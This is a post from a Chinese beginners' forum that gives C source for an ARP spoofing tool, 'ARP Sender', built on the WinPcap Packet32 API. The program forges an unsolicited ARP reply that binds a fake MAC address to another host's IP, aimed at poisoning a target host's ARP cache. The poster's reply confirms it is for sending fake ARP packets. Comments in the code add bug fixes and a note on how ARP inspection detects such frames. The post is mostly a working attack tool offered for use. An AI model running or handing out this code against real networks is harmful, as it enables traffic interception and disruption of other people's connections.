论坛: 菜鸟乐园 标题: 源代码 复制本贴地址    
作者: dfrog [dfrog]    论坛用户   登录
///////////////////////////////////////////////////////////////////////////////
//
//                ARP Sender
//
//          Creator:    Refdom
//          Email:      refdom@263.net
//          Home Page:  www.opengram.com
//
//          2002/4/7
//
////////////////////////////////////////////////////////////////////////////////

#include "stdafx.h"
//#include "Mac.h"    // GetMacAddr(): the author's helper that converts a string into a MAC address; it is not listed here
#include <stdio.h>
#include <Packet32.h>

/* EtherType values: written to eh_type, and EPT_IP also to arp_pro, in main() */
#define EPT_IP        0x0800            /* type: IP    */
#define EPT_ARP        0x0806            /* type: ARP */
#define EPT_RARP    0x8035            /* type: RARP */
/* Value written to arp_hrd in main(); hardware type 1 is Ethernet */
#define ARP_HARDWARE 0x0001            /* hardware type: Ethernet */
/* ARP opcodes written to arp_op */
#define    ARP_REQUEST    0x0001            /* ARP request */
#define    ARP_REPLY    0x0002            /* ARP reply */

/* Number of rows in main()'s AdapterList table */
#define Max_Num_Adapter 10

/* Byte-pack the structures below so their in-memory layout has no padding
 * and can be copied directly into the frame buffer. */
#pragma pack(push, 1)

/* Ethernet header: 6 + 6 + 2 = 14 bytes when packed. */
typedef struct ehhdr
{
    unsigned char    eh_dst[6];        /* destination ethernet address */
    unsigned char    eh_src[6];        /* source ethernet address */
    unsigned short    eh_type;        /* ethernet packet type (EPT_* value, network byte order) */
}EHHDR, *PEHHDR;


/* ARP header followed by the Ethernet/IPv4 address fields.
 * NOTE(review): arp_spa/arp_tpa are declared unsigned long, so the layout is
 * only correct where unsigned long is 32 bits (as on Windows); on an LP64
 * platform each would be 8 bytes and the structure would no longer match
 * the wire format. */
typedef struct arphdr
{
    unsigned short    arp_hrd;            /* format of hardware address */
    unsigned short    arp_pro;            /* format of protocol address */
    unsigned char    arp_hln;            /* length of hardware address */
    unsigned char    arp_pln;            /* length of protocol address */
    unsigned short    arp_op;                /* ARP/RARP operation */

    unsigned char    arp_sha[6];            /* sender hardware address */
    unsigned long    arp_spa;            /* sender protocol address */
    unsigned char    arp_tha[6];            /* target hardware address */
    unsigned long    arp_tpa;            /* target protocol address */
}ARPHDR, *PARPHDR;

/* Complete frame as sent by main(): Ethernet header immediately followed by
 * the ARP header. */
typedef struct arpPacket
{
    EHHDR    ehhdr;
    ARPHDR    arphdr;
} ARPPACKET, *PARPPACKET;

#pragma pack(pop)


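/*
 * Map one ASCII hex digit to its value (0-15).
 * Returns -1 for any other character, including the terminating NUL.
 */
static int HexNibble(char c)
{
    if (c >= '0' && c <= '9')
        return c - '0';
    if (c >= 'a' && c <= 'f')
        return c - 'a' + 10;
    if (c >= 'A' && c <= 'F')
        return c - 'A' + 10;
    return -1;
}

/*
 * GetMacAddr - convert a 12-hex-digit string into a 6-byte hardware address.
 *
 * s_str: NUL-terminated string of exactly 12 hex digits (no separators).
 * p:     output buffer of at least 6 bytes; written only on success.
 *
 * Returns 1 on success, 0 if either pointer is NULL or the string is not
 * exactly 12 hex digits.
 *
 * The previous body copied the characters and inserted '-' separators,
 * writing 17 bytes through p. Every caller in this file passes a 6-byte
 * buffer and then copies 6 bytes out of it, so that overflowed the caller's
 * stack buffer and never produced a binary address. It also never returned 0,
 * so the callers' error checks could not fire.
 */
int GetMacAddr(char *s_str,char *p)
{
    unsigned char mac[6];
    int i;

    if (s_str == 0 || p == 0)
        return 0;

    for (i = 0; i < 6; i++)
    {
        int hi;
        int lo;

        /* A NUL yields -1 here, so the scan never reads past the string end. */
        hi = HexNibble(s_str[2 * i]);
        if (hi < 0)
            return 0;
        lo = HexNibble(s_str[2 * i + 1]);
        if (lo < 0)
            return 0;
        mac[i] = (unsigned char)((hi << 4) | lo);
    }

    /* Reject trailing characters instead of silently ignoring them. */
    if (s_str[12] != '\0')
        return 0;

    /* Commit only after the whole input validated. */
    for (i = 0; i < 6; i++)
        p[i] = (char)mac[i];
    return 1;
}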

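/*
 * Opens the first adapter reported by the packet driver, fills in one
 * Ethernet + ARP reply frame from the hard-coded placeholder addresses
 * below, and hands it to the driver for transmission.
 *
 * Always returns 0, including on failure (unchanged from the original).
 *
 * Review notes on this revision:
 *  - the adapter-name scan is bounded by the AdapterName buffer and by the
 *    AdapterList table; the original read AdapterName[-1] on its first
 *    iteration and could write past AdapterList;
 *  - a failed first GetMacAddr() call now aborts like the other three;
 *  - the packet and adapter are released on every exit path after they
 *    have been acquired.
 *
 * Detection note: the frame built here has an ARP sender hardware address
 * (arp_sha) that differs from the Ethernet source address (eh_src) and is an
 * unsolicited reply. Both properties are what ARP-inspection controls and
 * ARP-monitoring tools check for.
 */
int main(int argc, char* argv[])
{
    static char AdapterList[Max_Num_Adapter][1024];   /* static: starts zero-filled */
    char szPacketBuf[600];
    char MacAddr[6];

    LPADAPTER    lpAdapter = NULL;
    LPPACKET    lpPacket = NULL;
    WCHAR        AdapterName[2048];
    WCHAR        *temp,*temp1,*pEnd;
    ARPPACKET ARPPacket;

    ULONG AdapterLength = 1024;
    size_t nameBytes;

    int AdapterNum = 0;
    int nRetCode, i;

    /* Zero the buffer first so the name scan below always finds a terminator
     * inside it, whatever the driver wrote. */
    ZeroMemory(AdapterName, sizeof(AdapterName));

    /* Get the list of adapters */
    if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
    {
        printf("Unable to retrieve the list of the adapters!\n");
        return 0;
    }

    /* The list is treated as consecutive NUL-terminated wide strings ended by
     * an empty string. NOTE(review): that is what the original code assumed;
     * confirm against the Packet32 version in use. */
    temp1 = AdapterName;
    pEnd = AdapterName + sizeof(AdapterName) / sizeof(AdapterName[0]);
    i = 0;
    for (temp = AdapterName; temp < pEnd && i < Max_Num_Adapter; temp++)
    {
        if (*temp != '\0')
            continue;
        if (temp == temp1)
            break;                          /* empty string: end of list */

        nameBytes = (size_t)(temp - temp1) * sizeof(WCHAR);
        /* Keep room for the terminator already present in the zeroed row;
         * names that do not fit are skipped rather than truncated. */
        if (nameBytes <= sizeof(AdapterList[i]) - sizeof(WCHAR))
        {
            memcpy(AdapterList[i], temp1, nameBytes);
            i++;
        }
        temp1 = temp + 1;
    }

    AdapterNum = i;
    for (i = 0; i < AdapterNum; i++)
        wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);
    printf("\n");

    if (AdapterNum == 0)
    {
        printf("No adapter found!\n");
        return 0;
    }

    /* Open adapter 0 by default (the first adapter is simply assumed) */
    lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[0]);

    if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
    {
        nRetCode = GetLastError();
        /* cast so the argument matches the %lx conversion */
        printf("Unable to open the driver, Error Code : %lx\n", (unsigned long)nRetCode);
        return 0;
    }

    lpPacket = PacketAllocatePacket();
    if(lpPacket == NULL)
    {
        printf("\nError:failed to allocate the LPPACKET structure.");
        goto cleanup;
    }

    ZeroMemory(szPacketBuf, sizeof(szPacketBuf));

    /* Ethernet destination field. (The original comment called this the
     * source MAC; the code writes eh_dst.) */
    if (!GetMacAddr("BBBBBBBBBBBB", MacAddr))
    {
        printf ("Get Mac address error!\n");
        goto cleanup;
    }
    memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6);

    /* Ethernet source field. (The original comment called this the
     * destination MAC, "A's address"; the code writes eh_src.) */
    if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))
    {
        printf ("Get Mac address error!\n");
        goto cleanup;
    }
    memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6);

    ARPPacket.ehhdr.eh_type = htons(EPT_ARP);

    ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
    ARPPacket.arphdr.arp_pro = htons(EPT_IP);
    ARPPacket.arphdr.arp_hln = 6;
    ARPPacket.arphdr.arp_pln = 4;
    ARPPacket.arphdr.arp_op = htons(ARP_REPLY);

    /* Sender fields: a forged MAC for host C paired with C's IP address */
    if (!GetMacAddr("DDDDDDDDDDDD", MacAddr))
    {
        printf ("Get Mac address error!\n");
        goto cleanup;
    }
    memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6);
    ARPPacket.arphdr.arp_spa = inet_addr("192.168.10.3");

    /* Target fields: host A's MAC and IP address */
    if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))
    {
        printf ("Get Mac address error!\n");
        goto cleanup;
    }
    memcpy(ARPPacket.arphdr.arp_tha , MacAddr, 6);
    ARPPacket.arphdr.arp_tpa = inet_addr("192.168.10.1");

    /* The buffer was zeroed above, so the bytes between the end of the
     * structure and the 60-byte length passed below are zero padding. */
    memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket));
    PacketInitPacket(lpPacket, szPacketBuf, 60);

    if(PacketSetNumWrites(lpAdapter, 2)==FALSE)
    {
        printf("warning: Unable to send more than one packet in a single write!\n");
    }

    if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
    {
        printf("Error sending the packets!\n");
        goto cleanup;
    }

    printf ("Send ok!\n");

cleanup:
    /* release the packet and close the adapter on every path that reaches here */
    if (lpPacket != NULL)
        PacketFreePacket(lpPacket);
    PacketCloseAdapter(lpAdapter);
    return 0;
}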


地主 发表时间: 12/03 20:37

回复: lida1818 [lida1818]   论坛用户   登录



[此贴被 烟雨平生(lida1818) 在 12月03日21时18分 编辑过]

B1层 发表时间: 12/03 20:57

回复: dfrog [dfrog]   论坛用户   登录
呵呵 是发送虚假arp包 呵呵

B2层 发表时间: 12/03 21:01
